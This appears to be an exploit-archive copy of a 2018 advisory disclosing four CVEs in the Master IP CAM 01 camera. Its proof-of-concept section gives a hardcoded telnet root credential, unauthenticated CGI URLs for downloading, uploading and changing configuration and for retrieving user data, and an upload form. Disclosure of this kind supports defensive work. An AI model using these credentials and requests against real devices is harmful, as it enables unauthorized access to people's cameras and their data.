Master IP CAM 01 Hardcoded Password / Unauthenticated Access

Master IP CAM 01 Hardcoded Password / Unauthenticated Access: Posted Jan 17, 2018; Authored by Daniele Linguaglossa, Raffaele Sabato; Master IP CAM version 01 has a hardcoded root password and suffers from multiple unauthenticated access vulnerabilities.; tags | exploit, root, vulnerability, bypass; advisories | CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726; SHA-256 | 1b7b16dc033365ff3162c79dfd711a78130a165f689c53737f95802789f1b521; Download | Favorite | View

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
# Date: 17-01-2018
# Remote: Yes
# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
 
I DESCRIPTION
========================================================================
The Master IP CAM 01 suffers of multiple vulnerabilities:
 
# [CVE-2018-5723] Hardcoded Password for Root Account
# [CVE-2018-5724] Unauthenticated Configuration Download and Upload
# [CVE-2018-5725] Unauthenticated Configuration Change
# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
 
 
II PROOF OF CONCEPT
========================================================================
 
## [CVE-2018-5723] Hardcoded Password for Root Account
 
Is possible to access telnet with the hardcoded credential root:cat1029
 
 
## [CVE-2018-5724] Unauthenticated Configuration Download and Upload
 
Download:
 
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
 
Upload Form:
 
### Unauthenticated Configuration Upload
<form name="form6" method="post" enctype="multipart/form-data"
action="cgi-bin/hi3510/restore.cgi" >
<input type="file" name="setting_file" >
<input type="submit" value="restore" >
</form>
 
 
## [CVE-2018-5725] Unauthenticated Configuration Change
 
Change configuration:
 
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
 
List of available commands here:
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
 
 
## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
 
Retrieve sensitive information:
 
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
 
 
III REFERENCES
========================================================================
http://syrion.me/blog/master-ipcam/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

Share This

Master IP CAM 01 Hardcoded Password / Unauthenticated Access

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems